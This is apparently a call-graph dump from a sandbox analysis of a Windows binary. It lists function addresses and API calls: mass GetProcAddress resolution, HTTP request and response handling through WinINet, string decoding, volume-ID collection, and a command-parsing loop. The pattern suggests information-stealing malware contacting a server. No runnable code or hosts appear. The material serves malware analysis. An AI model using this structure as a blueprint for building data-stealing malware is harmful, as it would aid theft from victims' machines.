34 API calls 44966->44967 44968 402727 44967->44968 44969 404610 34 API calls 44968->44969 44970 402740 44969->44970 44971 404610 34 API calls 44970->44971 44972 402759 44971->44972 44973 404610 34 API calls 44972->44973 44974 402786 44973->44974 44975 404610 34 API calls 44974->44975 44976 40279f 44975->44976 44977 404610 34 API calls 44976->44977 44978 4027b8 44977->44978 44979 404610 34 API calls 44978->44979 44980 4027e5 44979->44980 44981 404610 34 API calls 44980->44981 44982 4027fe 44981->44982 44983 404610 34 API calls 44982->44983 44984 402817 44983->44984 44985 404610 34 API calls 44984->44985 44986 402830 44985->44986 44987 404610 34 API calls 44986->44987 44988 402849 44987->44988 44989 404610 34 API calls 44988->44989 44990 402862 44989->44990 44991 404610 34 API calls 44990->44991 44992 40287b 44991->44992 44993 404610 34 API calls 44992->44993 44994 402894 44993->44994 44995 404610 34 API calls 44994->44995 44996 4028ad 44995->44996 44997 404610 34 API calls 44996->44997 44998 4028c6 44997->44998 44999 404610 34 API calls 44998->44999 45000 4028df 44999->45000 45001 404610 34 API calls 45000->45001 45002 4028f8 45001->45002 45003 404610 34 API calls 45002->45003 45004 402911 45003->45004 45005 404610 34 API calls 45004->45005 45006 40292a 45005->45006 45007 404610 34 API calls 45006->45007 45008 402943 45007->45008 45009 404610 34 API calls 45008->45009 45010 40295c 45009->45010 45011 404610 34 API calls 45010->45011 45012 402975 45011->45012 45013 404610 34 API calls 45012->45013 45014 40298e 45013->45014 45015 404610 34 API calls 45014->45015 45016 4029a7 45015->45016 45017 404610 34 API calls 45016->45017 45018 4029c0 45017->45018 45019 404610 34 API calls 45018->45019 45020 4029d9 45019->45020 45021 404610 34 API calls 45020->45021 45022 4029f2 45021->45022 45023 404610 34 API calls 45022->45023 45024 402a0b 45023->45024 45025 404610 34 API calls 45024->45025 45026 402a24 45025->45026 45027 404610 34 API calls 45026->45027 45028 402a3d 45027->45028 45029 404610 34 API calls 45028->45029 45030 402a56 45029->45030 45031 404610 34 API calls 45030->45031 45032 402a6f 45031->45032 45033 404610 34 API calls 45032->45033 45034 402a88 45033->45034 45035 404610 34 API calls 45034->45035 45036 402aa1 45035->45036 45037 404610 34 API calls 45036->45037 45038 402aba 45037->45038 45039 404610 34 API calls 45038->45039 45040 402ad3 45039->45040 45041 404610 34 API calls 45040->45041 45042 402aec 45041->45042 45043 404610 34 API calls 45042->45043 45044 402b05 45043->45044 45045 404610 34 API calls 45044->45045 45046 402b1e 45045->45046 45047 404610 34 API calls 45046->45047 45048 402b37 45047->45048 45049 404610 34 API calls 45048->45049 45050 402b50 45049->45050 45051 404610 34 API calls 45050->45051 45052 402b69 45051->45052 45053 404610 34 API calls 45052->45053 45054 402b82 45053->45054 45055 404610 34 API calls 45054->45055 45056 402b9b 45055->45056 45057 404610 34 API calls 45056->45057 45058 402bb4 45057->45058 45059 404610 34 API calls 45058->45059 45060 402bcd 45059->45060 45061 404610 34 API calls 45060->45061 45062 402be6 45061->45062 45063 404610 34 API calls 45062->45063 45064 402bff 45063->45064 45065 404610 34 API calls 45064->45065 45066 402c18 45065->45066 45067 404610 34 API calls 45066->45067 45068 402c31 45067->45068 45069 404610 34 API calls 45068->45069 45070 402c4a 45069->45070 45071 404610 34 API calls 45070->45071 45072 402c63 45071->45072 45073 404610 34 API calls 45072->45073 45074 402c7c 45073->45074 45075 404610 34 API calls 45074->45075 45076 402c95 45075->45076 45077 404610 34 API calls 45076->45077 45078 402cae 45077->45078 45079 404610 34 API calls 45078->45079 45080 402cc7 45079->45080 45081 404610 34 API calls 45080->45081 45082 402ce0 45081->45082 45083 404610 34 API calls 45082->45083 45084 402cf9 45083->45084 45085 404610 34 API calls 45084->45085 45086 402d12 45085->45086 45087 404610 34 API calls 45086->45087 45088 402d2b 45087->45088 45089 404610 34 API calls 45088->45089 45090 402d44 45089->45090 45091 404610 34 API calls 45090->45091 45092 402d5d 45091->45092 45093 404610 34 API calls 45092->45093 45094 402d76 45093->45094 45095 404610 34 API calls 45094->45095 45096 402d8f 45095->45096 45097 404610 34 API calls 45096->45097 45098 402da8 45097->45098 45099 404610 34 API calls 45098->45099 45100 402dc1 45099->45100 45101 404610 34 API calls 45100->45101 45102 402dda 45101->45102 45103 404610 34 API calls 45102->45103 45104 402df3 45103->45104 45105 404610 34 API calls 45104->45105 45106 402e0c 45105->45106 45107 404610 34 API calls 45106->45107 45108 402e25 45107->45108 45109 404610 34 API calls 45108->45109 45110 402e3e 45109->45110 45111 404610 34 API calls 45110->45111 45112 402e57 45111->45112 45113 404610 34 API calls 45112->45113 45114 402e70 45113->45114 45115 404610 34 API calls 45114->45115 45116 402e89 45115->45116 45117 404610 34 API calls 45116->45117 45118 402ea2 45117->45118 45119 404610 34 API calls 45118->45119 45120 402ebb 45119->45120 45121 404610 34 API calls 45120->45121 45122 402ed4 45121->45122 45123 404610 34 API calls 45122->45123 45124 402eed 45123->45124 45125 404610 34 API calls 45124->45125 45126 402f06 45125->45126 45127 404610 34 API calls 45126->45127 45128 402f1f 45127->45128 45129 404610 34 API calls 45128->45129 45130 402f38 45129->45130 45131 404610 34 API calls 45130->45131 45132 402f51 45131->45132 45133 404610 34 API calls 45132->45133 45134 402f6a 45133->45134 45135 404610 34 API calls 45134->45135 45136 402f83 45135->45136 45137 404610 34 API calls 45136->45137 45138 402f9c 45137->45138 45139 404610 34 API calls 45138->45139 45140 402fb5 45139->45140 45141 404610 34 API calls 45140->45141 45142 402fce 45141->45142 45143 404610 34 API calls 45142->45143 45144 402fe7 45143->45144 45145 404610 34 API calls 45144->45145 45146 403000 45145->45146 45147 404610 34 API calls 45146->45147 45148 403019 45147->45148 45149 404610 34 API calls 45148->45149 45150 403032 45149->45150 45151 404610 34 API calls 45150->45151 45152 40304b 45151->45152 45153 404610 34 API calls 45152->45153 45154 403064 45153->45154 45155 404610 34 API calls 45154->45155 45156 40307d 45155->45156 45157 404610 34 API calls 45156->45157 45158 403096 45157->45158 45159 404610 34 API calls 45158->45159 45160 4030af 45159->45160 45161 404610 34 API calls 45160->45161 45162 4030c8 45161->45162 45163 404610 34 API calls 45162->45163 45164 4030e1 45163->45164 45165 404610 34 API calls 45164->45165 45166 4030fa 45165->45166 45167 404610 34 API calls 45166->45167 45168 403113 45167->45168 45169 404610 34 API calls 45168->45169 45170 40312c 45169->45170 45171 404610 34 API calls 45170->45171 45172 403145 45171->45172 45173 404610 34 API calls 45172->45173 45174 40315e 45173->45174 45175 404610 34 API calls 45174->45175 45176 403177 45175->45176 45177 404610 34 API calls 45176->45177 45178 403190 45177->45178 45179 404610 34 API calls 45178->45179 45180 4031a9 45179->45180 45181 404610 34 API calls 45180->45181 45182 4031c2 45181->45182 45183 404610 34 API calls 45182->45183 45184 4031db 45183->45184 45185 404610 34 API calls 45184->45185 45186 4031f4 45185->45186 45187 404610 34 API calls 45186->45187 45188 40320d 45187->45188 45189 404610 34 API calls 45188->45189 45190 403226 45189->45190 45191 404610 34 API calls 45190->45191 45192 40323f 45191->45192 45193 404610 34 API calls 45192->45193 45194 403258 45193->45194 45195 404610 34 API calls 45194->45195 45196 403271 45195->45196 45197 404610 34 API calls 45196->45197 45198 40328a 45197->45198 45199 404610 34 API calls 45198->45199 45200 4032a3 45199->45200 45201 404610 34 API calls 45200->45201 45202 4032bc 45201->45202 45203 404610 34 API calls 45202->45203 45204 4032d5 45203->45204 45205 404610 34 API calls 45204->45205 45206 4032ee 45205->45206 45207 404610 34 API calls 45206->45207 45208 403307 45207->45208 45209 404610 34 API calls 45208->45209 45210 403320 45209->45210 45211 404610 34 API calls 45210->45211 45212 403339 45211->45212 45213 404610 34 API calls 45212->45213 45214 403352 45213->45214 45215 404610 34 API calls 45214->45215 45216 40336b 45215->45216 45217 404610 34 API calls 45216->45217 45218 403384 45217->45218 45219 404610 34 API calls 45218->45219 45220 40339d 45219->45220 45221 404610 34 API calls 45220->45221 45222 4033b6 45221->45222 45223 404610 34 API calls 45222->45223 45224 4033cf 45223->45224 45225 404610 34 API calls 45224->45225 45226 4033e8 45225->45226 45227 404610 34 API calls 45226->45227 45228 403401 45227->45228 45229 404610 34 API calls 45228->45229 45230 40341a 45229->45230 45231 404610 34 API calls 45230->45231 45232 403433 45231->45232 45233 404610 34 API calls 45232->45233 45234 40344c 45233->45234 45235 404610 34 API calls 45234->45235 45236 403465 45235->45236 45237 404610 34 API calls 45236->45237 45238 40347e 45237->45238 45239 404610 34 API calls 45238->45239 45240 403497 45239->45240 45241 404610 34 API calls 45240->45241 45242 4034b0 45241->45242 45243 404610 34 API calls 45242->45243 45244 4034c9 45243->45244 45245 404610 34 API calls 45244->45245 45246 4034e2 45245->45246 45247 404610 34 API calls 45246->45247 45248 4034fb 45247->45248 45249 404610 34 API calls 45248->45249 45250 403514 45249->45250 45251 404610 34 API calls 45250->45251 45252 40352d 45251->45252 45253 404610 34 API calls 45252->45253 45254 403546 45253->45254 45255 404610 34 API calls 45254->45255 45256 40355f 45255->45256 45257 404610 34 API calls 45256->45257 45258 403578 45257->45258 45259 404610 34 API calls 45258->45259 45260 403591 45259->45260 45261 404610 34 API calls 45260->45261 45262 4035aa 45261->45262 45263 404610 34 API calls 45262->45263 45264 4035c3 45263->45264 45265 404610 34 API calls 45264->45265 45266 4035dc 45265->45266 45267 404610 34 API calls 45266->45267 45268 4035f5 45267->45268 45269 404610 34 API calls 45268->45269 45270 40360e 45269->45270 45271 404610 34 API calls 45270->45271 45272 403627 45271->45272 45273 404610 34 API calls 45272->45273 45274 403640 45273->45274 45275 404610 34 API calls 45274->45275 45276 403659 45275->45276 45277 404610 34 API calls 45276->45277 45278 403672 45277->45278 45279 404610 34 API calls 45278->45279 45280 40368b 45279->45280 45281 404610 34 API calls 45280->45281 45282 4036a4 45281->45282 45283 404610 34 API calls 45282->45283 45284 4036bd 45283->45284 45285 404610 34 API calls 45284->45285 45286 4036d6 45285->45286 45287 404610 34 API calls 45286->45287 45288 4036ef 45287->45288 45289 404610 34 API calls 45288->45289 45290 403708 45289->45290 45291 404610 34 API calls 45290->45291 45292 403721 45291->45292 45293 404610 34 API calls 45292->45293 45294 40373a 45293->45294 45295 404610 34 API calls 45294->45295 45296 403753 45295->45296 45297 404610 34 API calls 45296->45297 45298 40376c 45297->45298 45299 404610 34 API calls 45298->45299 45300 403785 45299->45300 45301 404610 34 API calls 45300->45301 45302 40379e 45301->45302 45303 404610 34 API calls 45302->45303 45304 4037b7 45303->45304 45305 404610 34 API calls 45304->45305 45306 4037d0 45305->45306 45307 404610 34 API calls 45306->45307 45308 4037e9 45307->45308 45309 404610 34 API calls 45308->45309 45310 403802 45309->45310 45311 404610 34 API calls 45310->45311 45312 40381b 45311->45312 45313 404610 34 API calls 45312->45313 45314 403834 45313->45314 45315 404610 34 API calls 45314->45315 45316 40384d 45315->45316 45317 404610 34 API calls 45316->45317 45318 403866 45317->45318 45319 404610 34 API calls 45318->45319 45320 40387f 45319->45320 45321 404610 34 API calls 45320->45321 45322 403898 45321->45322 45323 404610 34 API calls 45322->45323 45324 4038b1 45323->45324 45325 404610 34 API calls 45324->45325 45326 4038ca 45325->45326 45327 404610 34 API calls 45326->45327 45328 4038e3 45327->45328 45329 404610 34 API calls 45328->45329 45330 4038fc 45329->45330 45331 404610 34 API calls 45330->45331 45332 403915 45331->45332 45333 404610 34 API calls 45332->45333 45334 40392e 45333->45334 45335 404610 34 API calls 45334->45335 45336 403947 45335->45336 45337 404610 34 API calls 45336->45337 45338 403960 45337->45338 45339 404610 34 API calls 45338->45339 45340 403979 45339->45340 45341 404610 34 API calls 45340->45341 45342 403992 45341->45342 45343 404610 34 API calls 45342->45343 45344 4039ab 45343->45344 45345 404610 34 API calls 45344->45345 45346 4039c4 45345->45346 45347 404610 34 API calls 45346->45347 45348 4039dd 45347->45348 45349 404610 34 API calls 45348->45349 45350 4039f6 45349->45350 45351 404610 34 API calls 45350->45351 45352 403a0f 45351->45352 45353 404610 34 API calls 45352->45353 45354 403a28 45353->45354 45355 404610 34 API calls 45354->45355 45356 403a41 45355->45356 45357 404610 34 API calls 45356->45357 45358 403a5a 45357->45358 45359 404610 34 API calls 45358->45359 45360 403a73 45359->45360 45361 404610 34 API calls 45360->45361 45362 403a8c 45361->45362 45363 404610 34 API calls 45362->45363 45364 403aa5 45363->45364 45365 404610 34 API calls 45364->45365 45366 403abe 45365->45366 45367 404610 34 API calls 45366->45367 45368 403ad7 45367->45368 45369 404610 34 API calls 45368->45369 45370 403af0 45369->45370 45371 404610 34 API calls 45370->45371 45372 403b09 45371->45372 45373 404610 34 API calls 45372->45373 45374 403b22 45373->45374 45375 404610 34 API calls 45374->45375 45376 403b3b 45375->45376 45377 404610 34 API calls 45376->45377 45378 403b54 45377->45378 45379 404610 34 API calls 45378->45379 45380 403b6d 45379->45380 45381 404610 34 API calls 45380->45381 45382 403b86 45381->45382 45383 404610 34 API calls 45382->45383 45384 403b9f 45383->45384 45385 404610 34 API calls 45384->45385 45386 403bb8 45385->45386 45387 404610 34 API calls 45386->45387 45388 403bd1 45387->45388 45389 404610 34 API calls 45388->45389 45390 403bea 45389->45390 45391 404610 34 API calls 45390->45391 45392 403c03 45391->45392 45393 404610 34 API calls 45392->45393 45394 403c1c 45393->45394 45395 404610 34 API calls 45394->45395 45396 403c35 45395->45396 45397 404610 34 API calls 45396->45397 45398 403c4e 45397->45398 45399 404610 34 API calls 45398->45399 45400 403c67 45399->45400 45401 404610 34 API calls 45400->45401 45402 403c80 45401->45402 45403 404610 34 API calls 45402->45403 45404 403c99 45403->45404 45405 404610 34 API calls 45404->45405 45406 403cb2 45405->45406 45407 404610 34 API calls 45406->45407 45408 403ccb 45407->45408 45409 404610 34 API calls 45408->45409 45410 403ce4 45409->45410 45411 404610 34 API calls 45410->45411 45412 403cfd 45411->45412 45413 404610 34 API calls 45412->45413 45414 403d16 45413->45414 45415 404610 34 API calls 45414->45415 45416 403d2f 45415->45416 45417 404610 34 API calls 45416->45417 45418 403d48 45417->45418 45419 404610 34 API calls 45418->45419 45420 403d61 45419->45420 45421 404610 34 API calls 45420->45421 45422 403d7a 45421->45422 45423 404610 34 API calls 45422->45423 45424 403d93 45423->45424 45425 404610 34 API calls 45424->45425 45426 403dac 45425->45426 45427 404610 34 API calls 45426->45427 45428 403dc5 45427->45428 45429 404610 34 API calls 45428->45429 45430 403dde 45429->45430 45431 404610 34 API calls 45430->45431 45432 403df7 45431->45432 45433 404610 34 API calls 45432->45433 45434 403e10 45433->45434 45435 404610 34 API calls 45434->45435 45436 403e29 45435->45436 45437 404610 34 API calls 45436->45437 45438 403e42 45437->45438 45439 404610 34 API calls 45438->45439 45440 403e5b 45439->45440 45441 404610 34 API calls 45440->45441 45442 403e74 45441->45442 45443 404610 34 API calls 45442->45443 45444 403e8d 45443->45444 45445 404610 34 API calls 45444->45445 45446 403ea6 45445->45446 45447 404610 34 API calls 45446->45447 45448 403ebf 45447->45448 45449 404610 34 API calls 45448->45449 45450 403ed8 45449->45450 45451 404610 34 API calls 45450->45451 45452 403ef1 45451->45452 45453 404610 34 API calls 45452->45453 45454 403f0a 45453->45454 45455 404610 34 API calls 45454->45455 45456 403f23 45455->45456 45457 404610 34 API calls 45456->45457 45458 403f3c 45457->45458 45459 404610 34 API calls 45458->45459 45460 403f55 45459->45460 45461 404610 34 API calls 45460->45461 45462 403f6e 45461->45462 45463 404610 34 API calls 45462->45463 45464 403f87 45463->45464 45465 404610 34 API calls 45464->45465 45466 403fa0 45465->45466 45467 404610 34 API calls 45466->45467 45468 403fb9 45467->45468 45469 404610 34 API calls 45468->45469 45470 403fd2 45469->45470 45471 404610 34 API calls 45470->45471 45472 403feb 45471->45472 45473 404610 34 API calls 45472->45473 45474 404004 45473->45474 45475 404610 34 API calls 45474->45475 45476 40401d 45475->45476 45477 404610 34 API calls 45476->45477 45478 404036 45477->45478 45479 404610 34 API calls 45478->45479 45480 40404f 45479->45480 45481 404610 34 API calls 45480->45481 45482 404068 45481->45482 45483 404610 34 API calls 45482->45483 45484 404081 45483->45484 45485 404610 34 API calls 45484->45485 45486 40409a 45485->45486 45487 404610 34 API calls 45486->45487 45488 4040b3 45487->45488 45489 404610 34 API calls 45488->45489 45490 4040cc 45489->45490 45491 404610 34 API calls 45490->45491 45492 4040e5 45491->45492 45493 404610 34 API calls 45492->45493 45494 4040fe 45493->45494 45495 404610 34 API calls 45494->45495 45496 404117 45495->45496 45497 404610 34 API calls 45496->45497 45498 404130 45497->45498 45499 404610 34 API calls 45498->45499 45500 404149 45499->45500 45501 404610 34 API calls 45500->45501 45502 404162 45501->45502 45503 404610 34 API calls 45502->45503 45504 40417b 45503->45504 45505 404610 34 API calls 45504->45505 45506 404194 45505->45506 45507 404610 34 API calls 45506->45507 45508 4041ad 45507->45508 45509 404610 34 API calls 45508->45509 45510 4041c6 45509->45510 45511 404610 34 API calls 45510->45511 45512 4041df 45511->45512 45513 404610 34 API calls 45512->45513 45514 4041f8 45513->45514 45515 404610 34 API calls 45514->45515 45516 404211 45515->45516 45517 404610 34 API calls 45516->45517 45518 40422a 45517->45518 45519 404610 34 API calls 45518->45519 45520 404243 45519->45520 45521 404610 34 API calls 45520->45521 45522 40425c 45521->45522 45523 404610 34 API calls 45522->45523 45524 404275 45523->45524 45525 404610 34 API calls 45524->45525 45526 40428e 45525->45526 45527 404610 34 API calls 45526->45527 45528 4042a7 45527->45528 45529 404610 34 API calls 45528->45529 45530 4042c0 45529->45530 45531 404610 34 API calls 45530->45531 45532 4042d9 45531->45532 45533 404610 34 API calls 45532->45533 45534 4042f2 45533->45534 45535 404610 34 API calls 45534->45535 45536 40430b 45535->45536 45537 404610 34 API calls 45536->45537 45538 404324 45537->45538 45539 404610 34 API calls 45538->45539 45540 40433d 45539->45540 45541 404610 34 API calls 45540->45541 45542 404356 45541->45542 45543 404610 34 API calls 45542->45543 45544 40436f 45543->45544 45545 404610 34 API calls 45544->45545 45546 404388 45545->45546 45547 404610 34 API calls 45546->45547 45548 4043a1 45547->45548 45549 404610 34 API calls 45548->45549 45550 4043ba 45549->45550 45551 404610 34 API calls 45550->45551 45552 4043d3 45551->45552 45553 404610 34 API calls 45552->45553 45554 4043ec 45553->45554 45555 404610 34 API calls 45554->45555 45556 404405 45555->45556 45557 404610 34 API calls 45556->45557 45558 40441e 45557->45558 45559 404610 34 API calls 45558->45559 45560 404437 45559->45560 45561 404610 34 API calls 45560->45561 45562 404450 45561->45562 45563 404610 34 API calls 45562->45563 45564 404469 45563->45564 45565 404610 34 API calls 45564->45565 45566 404482 45565->45566 45567 404610 34 API calls 45566->45567 45568 40449b 45567->45568 45569 404610 34 API calls 45568->45569 45570 4044b4 45569->45570 45571 404610 34 API calls 45570->45571 45572 4044cd 45571->45572 45573 404610 34 API calls 45572->45573 45574 4044e6 45573->45574 45575 404610 34 API calls 45574->45575 45576 4044ff 45575->45576 45577 404610 34 API calls 45576->45577 45578 404518 45577->45578 45579 404610 34 API calls 45578->45579 45580 404531 45579->45580 45581 404610 34 API calls 45580->45581 45582 40454a 45581->45582 45583 404610 34 API calls 45582->45583 45584 404563 45583->45584 45585 404610 34 API calls 45584->45585 45586 40457c 45585->45586 45587 404610 34 API calls 45586->45587 45588 404595 45587->45588 45589 404610 34 API calls 45588->45589 45590 4045ae 45589->45590 45591 404610 34 API calls 45590->45591 45592 4045c7 45591->45592 45593 404610 34 API calls 45592->45593 45594 4045e0 45593->45594 45595 404610 34 API calls 45594->45595 45596 4045f9 45595->45596 45597 419f20 45596->45597 45598 419f30 43 API calls 45597->45598 45599 41a346 8 API calls 45597->45599 45598->45599 45600 41a456 45599->45600 45601 41a3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45599->45601 45602 41a463 8 API calls 45600->45602 45603 41a526 45600->45603 45601->45600 45602->45603 45604 41a5a8 45603->45604 45605 41a52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45603->45605 45606 41a5b5 6 API calls 45604->45606 45607 41a647 45604->45607 45605->45604 45606->45607 45608 41a654 9 API calls 45607->45608 45609 41a72f 45607->45609 45608->45609 45610 41a7b2 45609->45610 45611 41a738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45609->45611 45612 41a7bb GetProcAddress GetProcAddress 45610->45612 45613 41a7ec 45610->45613 45611->45610 45612->45613 45614 41a825 45613->45614 45615 41a7f5 GetProcAddress GetProcAddress 45613->45615 45616 41a922 45614->45616 45617 41a832 10 API calls 45614->45617 45615->45614 45618 41a92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45616->45618 45619 41a98d 45616->45619 45617->45616 45618->45619 45620 41a996 GetProcAddress 45619->45620 45621 41a9ae 45619->45621 45620->45621 45622 41a9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 45621->45622 45623 415ef3 45621->45623 45622->45623 45624 401590 45623->45624 45898 4016b0 45624->45898 45627 41aab0 lstrcpy 45628 4015b5 45627->45628 45629 41aab0 lstrcpy 45628->45629 45630 4015c7 45629->45630 45631 41aab0 lstrcpy 45630->45631 45632 4015d9 45631->45632 45633 41aab0 lstrcpy 45632->45633 45634 401663 45633->45634 45635 415760 45634->45635 45636 415771 45635->45636 45637 41ab30 2 API calls 45636->45637 45638 41577e 45637->45638 45639 41ab30 2 API calls 45638->45639 45640 41578b 45639->45640 45641 41ab30 2 API calls 45640->45641 45642 415798 45641->45642 45643 41aa50 lstrcpy 45642->45643 45644 4157a5 45643->45644 45645 41aa50 lstrcpy 45644->45645 45646 4157b2 45645->45646 45647 41aa50 lstrcpy 45646->45647 45648 4157bf 45647->45648 45649 41aa50 lstrcpy 45648->45649 45689 4157cc 45649->45689 45650 41aa50 lstrcpy 45650->45689 45651 41ab30 lstrlenA lstrcpy 45651->45689 45652 41abb0 lstrcpy 45652->45689 45653 415893 StrCmpCA 45653->45689 45654 4158f0 StrCmpCA 45655 415a2c 45654->45655 45654->45689 45657 41abb0 lstrcpy 45655->45657 45656 41aab0 lstrcpy 45656->45689 45658 415a38 45657->45658 45659 41ab30 2 API calls 45658->45659 45660 415a46 45659->45660 45663 41ab30 2 API calls 45660->45663 45661 415aa6 StrCmpCA 45664 415be1 45661->45664 45661->45689 45662 415440 23 API calls 45662->45689 45666 415a55 45663->45666 45665 41abb0 lstrcpy 45664->45665 45667 415bed 45665->45667 45668 4016b0 lstrcpy 45666->45668 45669 41ab30 2 API calls 45667->45669 45688 415a61 45668->45688 45670 415bfb 45669->45670 45673 41ab30 2 API calls 45670->45673 45671 415c5b StrCmpCA 45674 415c66 Sleep 45671->45674 45675 415c78 45671->45675 45672 415510 29 API calls 45672->45689 45676 415c0a 45673->45676 45674->45689 45677 41abb0 lstrcpy 45675->45677 45678 4016b0 lstrcpy 45676->45678 45679 415c84 45677->45679 45678->45688 45680 41ab30 2 API calls 45679->45680 45681 415c93 45680->45681 45682 41ab30 2 API calls 45681->45682 45684 415ca2 45682->45684 45683 4159da StrCmpCA 45683->45689 45685 4016b0 lstrcpy 45684->45685 45685->45688 45686 415b8f StrCmpCA 45686->45689 45687 401590 lstrcpy 45687->45689 45688->44743 45689->45650 45689->45651 45689->45652 45689->45653 45689->45654 45689->45656 45689->45661 45689->45662 45689->45671 45689->45672 45689->45683 45689->45686 45689->45687 45691 4176e3 GetVolumeInformationA 45690->45691 45692 4176dc 45690->45692 45693 417721 45691->45693 45692->45691 45694 41778c GetProcessHeap HeapAlloc 45693->45694 45695 4177a9 45694->45695 45696 4177b8 wsprintfA 45694->45696 45697 41aa50 lstrcpy 45695->45697 45698 41aa50 lstrcpy 45696->45698 45699 415ff7 45697->45699 45698->45699 45699->44764 45701 41aab0 lstrcpy 45700->45701 45702 4048e9 45701->45702 45907 404800 45702->45907 45704 4048f5 45705 41aa50 lstrcpy 45704->45705 45706 404927 45705->45706 45707 41aa50 lstrcpy 45706->45707 45708 404934 45707->45708 45709 41aa50 lstrcpy 45708->45709 45710 404941 45709->45710 45711 41aa50 lstrcpy 45710->45711 45712 40494e 45711->45712 45713 41aa50 lstrcpy 45712->45713 45714 40495b InternetOpenA StrCmpCA 45713->45714 45715 404994 45714->45715 45716 404f1b InternetCloseHandle 45715->45716 45915 418cf0 45715->45915 45718 404f38 45716->45718 45930 40a210 CryptStringToBinaryA 45718->45930 45719 4049b3 45923 41ac30 45719->45923 45722 4049c6 45724 41abb0 lstrcpy 45722->45724 45730 4049cf 45724->45730 45725 41ab30 2 API calls 45726 404f55 45725->45726 45728 41acc0 4 API calls 45726->45728 45727 404f77 ctype 45732 41aab0 lstrcpy 45727->45732 45729 404f6b 45728->45729 45731 41abb0 lstrcpy 45729->45731 45733 41acc0 4 API calls 45730->45733 45731->45727 45744 404fa7 45732->45744 45734 4049f9 45733->45734 45735 41abb0 lstrcpy 45734->45735 45736 404a02 45735->45736 45737 41acc0 4 API calls 45736->45737 45738 404a21 45737->45738 45739 41abb0 lstrcpy 45738->45739 45740 404a2a 45739->45740 45741 41ac30 3 API calls 45740->45741 45742 404a48 45741->45742 45743 41abb0 lstrcpy 45742->45743 45745 404a51 45743->45745 45744->44767 45746 41acc0 4 API calls 45745->45746 45747 404a70 45746->45747 45748 41abb0 lstrcpy 45747->45748 45749 404a79 45748->45749 45750 41acc0 4 API calls 45749->45750 45751 404a98 45750->45751 45752 41abb0 lstrcpy 45751->45752 45753 404aa1 45752->45753 45754 41acc0 4 API calls 45753->45754 45755 404acd 45754->45755 45756 41ac30 3 API calls 45755->45756 45757 404ad4 45756->45757 45758 41abb0 lstrcpy 45757->45758 45759 404add 45758->45759 45760 404af3 InternetConnectA 45759->45760 45760->45716 45761 404b23 HttpOpenRequestA 45760->45761 45763 404b78 45761->45763 45764 404f0e InternetCloseHandle 45761->45764 45765 41acc0 4 API calls 45763->45765 45764->45716 45766 404b8c 45765->45766 45767 41abb0 lstrcpy 45766->45767 45768 404b95 45767->45768 45769 41ac30 3 API calls 45768->45769 45770 404bb3 45769->45770 45771 41abb0 lstrcpy 45770->45771 45772 404bbc 45771->45772 45773 41acc0 4 API calls 45772->45773 45774 404bdb 45773->45774 45775 41abb0 lstrcpy 45774->45775 45776 404be4 45775->45776 45777 41acc0 4 API calls 45776->45777 45778 404c05 45777->45778 45779 41abb0 lstrcpy 45778->45779 45780 404c0e 45779->45780 45781 41acc0 4 API calls 45780->45781 45782 404c2e 45781->45782 45783 41abb0 lstrcpy 45782->45783 45784 404c37 45783->45784 45785 41acc0 4 API calls 45784->45785 45786 404c56 45785->45786 45787 41abb0 lstrcpy 45786->45787 45788 404c5f 45787->45788 45789 41ac30 3 API calls 45788->45789 45790 404c7d 45789->45790 45791 41abb0 lstrcpy 45790->45791 45792 404c86 45791->45792 45793 41acc0 4 API calls 45792->45793 45794 404ca5 45793->45794 45795 41abb0 lstrcpy 45794->45795 45796 404cae 45795->45796 45797 41acc0 4 API calls 45796->45797 45798 404ccd 45797->45798 45799 41abb0 lstrcpy 45798->45799 45800 404cd6 45799->45800 45801 41ac30 3 API calls 45800->45801 45802 404cf4 45801->45802 45803 41abb0 lstrcpy 45802->45803 45804 404cfd 45803->45804 45805 41acc0 4 API calls 45804->45805 45806 404d1c 45805->45806 45807 41abb0 lstrcpy 45806->45807 45808 404d25 45807->45808 45809 41acc0 4 API calls 45808->45809 45810 404d46 45809->45810 45811 41abb0 lstrcpy 45810->45811 45812 404d4f 45811->45812 45813 41acc0 4 API calls 45812->45813 45814 404d6f 45813->45814 45815 41abb0 lstrcpy 45814->45815 45816 404d78 45815->45816 45817 41acc0 4 API calls 45816->45817 45818 404d97 45817->45818 45819 41abb0 lstrcpy 45818->45819 45820 404da0 45819->45820 45821 41ac30 3 API calls 45820->45821 45822 404dbe 45821->45822 45823 41abb0 lstrcpy 45822->45823 45824 404dc7 45823->45824 45825 41aa50 lstrcpy 45824->45825 45826 404de2 45825->45826 45827 41ac30 3 API calls 45826->45827 45828 404e03 45827->45828 45829 41ac30 3 API calls 45828->45829 45830 404e0a 45829->45830 45831 41abb0 lstrcpy 45830->45831 45832 404e16 45831->45832 45833 404e37 lstrlenA 45832->45833 45834 404e4a 45833->45834 45835 404e53 lstrlenA 45834->45835 45929 41ade0 45835->45929 45837 404e63 HttpSendRequestA 45838 404e82 InternetReadFile 45837->45838 45839 404eb7 InternetCloseHandle 45838->45839 45844 404eae 45838->45844 45841 41ab10 45839->45841 45841->45764 45842 41acc0 4 API calls 45842->45844 45843 41abb0 lstrcpy 45843->45844 45844->45838 45844->45839 45844->45842 45844->45843 45939 41ade0 45845->45939 45847 411a14 StrCmpCA 45848 411a27 45847->45848 45849 411a1f ExitProcess 45847->45849 45850 411a37 strtok_s 45848->45850 45862 411a44 45850->45862 45851 411c12 45851->44769 45852 411bee strtok_s 45852->45862 45853 411b41 StrCmpCA 45853->45862 45854 411ba1 StrCmpCA 45854->45862 45855 411bc0 StrCmpCA 45855->45862 45856 411b63 StrCmpCA 45856->45862 45857 411b82 StrCmpCA 45857->45862 45858 411aad StrCmpCA 45858->45862 45859 411acf StrCmpCA 45859->45862 45860 411afd StrCmpCA 45860->45862 45861 411b1f StrCmpCA 45861->45862 45862->45851 45862->45852 45862->45853 45862->45854 45862->45855 45862->45856 45862->45857 45862->45858 45862->45859 45862->45860 45862->45861 45863 41ab30 lstrlenA lstrcpy 45862->45863 45864 41ab30 2 API calls 45862->45864 45863->45862 45864->45852 45865->44775 45866->44777 45867->44783 45868->44785 45869->44791 45870->44793 45871->44797 45872->44801 45873->44805 45874->44811 45875->44813 45876->44817 45877->44831 45878->44834 45879->44835 45880->44830 45881->44835 45882->44850 45883->44838 45884->44841 45885->44844 45886->44847 45887->44852 45888->44854 45889->44861 45890->44867 45891->44888 45892->44892 45893->44891 45894->44887 45895->44891 45896->44901 45899 41aab0 lstrcpy 